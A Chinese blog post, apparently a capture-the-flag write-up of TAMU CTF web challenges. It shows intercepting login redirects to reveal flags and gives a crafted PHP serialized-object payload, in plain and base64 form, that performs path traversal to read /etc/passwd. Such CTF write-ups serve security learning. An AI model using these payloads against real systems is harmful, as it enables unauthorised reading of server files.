TAMU复现

于 2022-04-19 10:01:28 发布
阅读量94 收藏
点赞数
分类专栏: 比赛复现 文章标签: 复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/124265809
版权

Triplet

在源码处有现成的

在这里插入图片描述
在这里插入图片描述

Lock Out

每次我们登录不成功就会重定向一个flag页面,我们可以拦截他的响应,来获取flag,这边有两种方法。

0x01

加上PrintFlag参数,我们可以看到在302页面有个get传。

在这里插入图片描述

0x02

勾选上此选项
在这里插入图片描述
然后就可拦截响应并修改了,我们把302页面改为200,在发送,然后在页面上点击printflag就行了。
在这里插入图片描述

Serial Killer

抓包可以看到一串经过base64编码的序列化。
在这里插入图片描述
解码后可以看到访问文件处。

O:7:"GetPage":1:{s:4:"file";s:10:"index.html";}

并且他对/过滤了,我们可以url编码,再base64编码

O:7:"GetPage":1:{s:4:"file";s:27:"..%2F..%2F..%2Fetc%2Fpasswd";}

Tzo3OiJHZXRQYWdlIjoxOntzOjQ6ImZpbGUiO3M6Mjc6Ii4uJTJGLi4lMkYuLiUyRmV0YyUyRnBhc3N3ZCI7fQ==

在这里插入图片描述

succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
TAMU-Datathon
02-20
TAMU-Datathon 该竞赛于2019年10月19日至20日在德克萨斯A&M大学举行。 这是ConocoPhilips提出的数据科学挑战赛。挑战说明与所有机械设备一样,事情会破裂,而当事情破裂时,金钱会以维修和石油生产的形式损失。 当...
TAMU-ECEN-350
02-24
TAMU-ECEN-350 该存储库包含我针对ECEN 350的工作。 这仅是为了向公众展示我的作品。 如果您目前正在德克萨斯农工大学学习ECEN 350或计划参加该课程,请等到学期结束后下载或查看这些解决方案。 “阿吉不会说谎,...
CSCE-314-tamu
05-01
CSCE-314 CSCE 314客人
TAMU_DS_Tutorial
02-22
TAMU_DS_Tutorial
TAMU ME 教授名单
08-08
碉堡了,如果有兴趣的话看看,真的挺好的1
计算机专业毕业设计范例845篇jsp2118基于Web停车场管理系统的设计与实现_Servlet_MySql演示录像.rar
05-24
博主给大家详细整理了计算机毕业设计最新项目,对项目有任何疑问(部署跟文档),都可以问博主哦~ 一、JavaWeb管理系统毕设项目【计算机毕设选题】计算机毕业设计选题,500个热门选题推荐,更多作品展示 计算机毕业设计|PHP毕业设计|JSP毕业程序设计|Android毕业设计|Python设计论文|微信小程序设计
Windows 10 平台 FFmpeg 开发环境搭建 博客资源
05-24
【FFmpeg】Windows 10 平台 FFmpeg 开发环境搭建 ④ ( FFmpeg 开发库内容说明 | 创建并配置 FFmpeg 项目 | 拷贝 DLL 动态库到 SysWOW64 目录 ) https://hanshuliang.blog.csdn.net/article/details/139172564 博客资源 一、FFmpeg 开发库 1、FFmpeg 开发库编译 2、FFmpeg 开发库内容说明 二、创建并配置 FFmpeg 项目 1、拷贝 dll 动态库到 C:\Windows\SysWOW64 目录 - 必须操作 特别关注 2、创建 Qt 项目 - C 语言程序 3、配置 FFmpeg 开发库 - C 语言项目 4、创建并配置 FFmpeg 开发库 - C++ 项目
基于 Spring Cloud 、Spring Boot、 OAuth2 的 RBAC 企业快速开发平台
05-24
基于 Spring Cloud 、Spring Boot、 OAuth2 的 RBAC 企业快速开发平台, 同时支持微服务架构和单体架构。提供对 Spring Authorization Server 生产级实践,支持多种安全授权模式。提供对常见容器化方案支持 Kubernetes、Rancher2 、Kubesphere、EDAS、SAE 支持
我赚100万的商业模式.pdf
05-24
我赚100万的商业模式
Python_编译器学习资源收集.zip
05-24
Python_编译器学习资源收集
VP01663276_VV20238868_20231114_133104_571.bin.dec.enc
05-24
VP01663276_VV20238868_20231114_133104_571.bin.dec.enc
本人自己开发,用来提高工作效率的Arcgis工具箱,免费分享
05-24
地理信息Arcgis常用分析工具箱,包括补零更新编号、根据分组字段补零更新编号、递归文件夹下数据库要素转表、批量统计图层要素数量和字段汇总信息、批量擦除图层、文件夹或数据库递归属性表加图层信息、按属性分割要素、按属性分组合并等,,如有疑问或者需求可私信或QQ联系775915005
易语言记录键盘鼠标录制源码.zip
05-24
开发语言:易语言5.93 模块依赖:无需其他模块ec 采用DLL里面接口实现键盘记录
这一期播客,我从老范这里学到的几个关键知识点.pdf
05-24
这一期播客,我从老范这里学到的几个关键知识点
计算机专业毕业设计范例500篇JSP2014_0002网上在线茶叶销售购物管理系统录像1.rar
05-24
博主给大家详细整理了计算机毕业设计最新项目,对项目有任何疑问(部署跟文档),都可以问博主哦~ 一、JavaWeb管理系统毕设项目【计算机毕设选题】计算机毕业设计选题,500个热门选题推荐,更多作品展示 计算机毕业设计|PHP毕业设计|JSP毕业程序设计|Android毕业设计|Python设计论文|微信小程序设计
C#实现简易版别踩白块
最新发布
05-24
使用Windows Forms来创建游戏的界面。这将包括创建游戏窗口、按钮、游戏区域等。 在游戏区域内,你需要绘制黑色的方块(玩家可以踩的)和白色的方块(玩家需要避免的)。 使用Timer控件或System.Timers.Timer类来定期更新游戏状态,例如移动方块或检查玩家的输入。编写逻辑来检测玩家的输入(例如点击的位置)是否与白色方块重叠。如果重叠,那么玩家“踩”到了白块,游戏结束或扣分。实现游戏的主要逻辑,例如得分规则、游戏结束条件等。
计算机专业毕业设计范例427篇jsp2127人力资源员工考勤薪资企业人事管理系统servlet+mysql演示录像.rar
05-24
博主给大家详细整理了计算机毕业设计最新项目,对项目有任何疑问(部署跟文档),都可以问博主哦~ 一、JavaWeb管理系统毕设项目【计算机毕设选题】计算机毕业设计选题,500个热门选题推荐,更多作品展示 计算机毕业设计|PHP毕业设计|JSP毕业程序设计|Android毕业设计|Python设计论文|微信小程序设计
Python_可以进行语义搜索的小型结构化编码教程.zip
05-24
Python_可以进行语义搜索的小型结构化编码教程
《STM32单片机+DHT11温湿度+按键设置温湿度阈值+OLED屏幕》源代码
05-24
《基于STM32单片机智能家居环境监控系统的设计与实现》毕业设计项目 1.STM32单片机+DHT11温湿度+按键设置温湿度阈值+OLED屏幕 2.OLED屏幕显示温湿度 3.OLED屏幕分别显示最低温度阈值、最高温度阈值、最低湿度阈值、最高湿度阈值 3.按键1选择功能 4.按键2对阈值进行加 5.按键3对阈值进行减
SUITESPARSE库
10-25
SUITESPARSE是一个用于稀疏矩阵计算的开源库,它提供了一些高效的算法和数据结构,包括LU分解、QR分解、Cholesky分解、最小二乘法等。SUITESPARSE库的主要特点是它能够处理非常大的稀疏矩阵,并且具有很高的性能和可扩展性。该库还提供了一些工具,如MATLAB接口和可视化工具,方便用户使用和调试。 SUITESPARSE库的开发者是Timothy A. Davis,他也是其他一些著名的稀疏矩阵计算库的开发者,如UMFPACK和CHOLMOD。SUITESPARSE库是在BSD许可证下发布的,因此可以免费使用和修改。 如果您需要进行稀疏矩阵计算,SUITESPARSE库是一个非常不错的选择。它已经被广泛应用于科学计算、工程计算、机器学习等领域。如果您想了解更多关于SUITESPARSE库的信息,可以访问它的官方网站:http://faculty.cse.tamu.edu/davis/suitesparse.html

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值